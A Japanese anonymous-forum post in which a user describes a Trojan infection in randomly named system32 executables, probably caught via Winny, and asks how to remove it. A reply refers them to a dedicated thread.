【スキャンした結果(ウイルス名・発見場所)】オート・プロテクトでTrojan HorseがC:\WINDOWS\system32のexeファイルに見つかりました。
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
ウイルスが見つかったexeファイルはPoller.exe以外、小文字アルファベット6〜7文字でランダムな名前がついていて、
再起動したり、ユーザーを変えたりするとexeファイルの名前が変わります。

セーフモードで起動するために、ウイルスが見つかってから何回目かの「ファイル名を指定して実行」を選択した時に、
前に実行していない「regedit」が入力窓にあったので、レジストリをいじられたかもしれません。

HSP56 modemをアンインストールしますか?って表示が出て、noを選択したら、Prefetchが開かれました。
(その前にPrefetchで、ウイルス検出ファイルと同じ名前のファイルと、怪しいファイルを捨ててたので、その影響かもしれません)
【何をしたらそんなことになったのか】 うpろだかからか、ウィニーだと思います。たぶん後者です。
【これまでにとった措置】
exeファイルを削除しようとしても使用中でほとんど削除できませんでした。
何回かshift+delで削除できましたが、ウイルスはちゃんと削除できていないようです。

ユーザーを変えてスキャンすると、ウイルスが見つからない時もありました。
セーフモードでも、スキャンしました。
PC GATEでexeファイルなどのアクセスを制限したら、XP起動後に出てたオート・プロテクトのウイルス検出警告が出なくなり、
Cドライブをスキャンしてもウイルスが検出されませんでした。


どうすれば完全にウイルスを削除できるのでしょうか?
長くなってしまいましたが、ご教授の程よろしくお願いいたします。

ちなみに、OS再インストールしようかと考えております。
986名無しさん@お腹いっぱい。
>>985
Winny関連のウィルスは、Download板に専門スレッドがあります。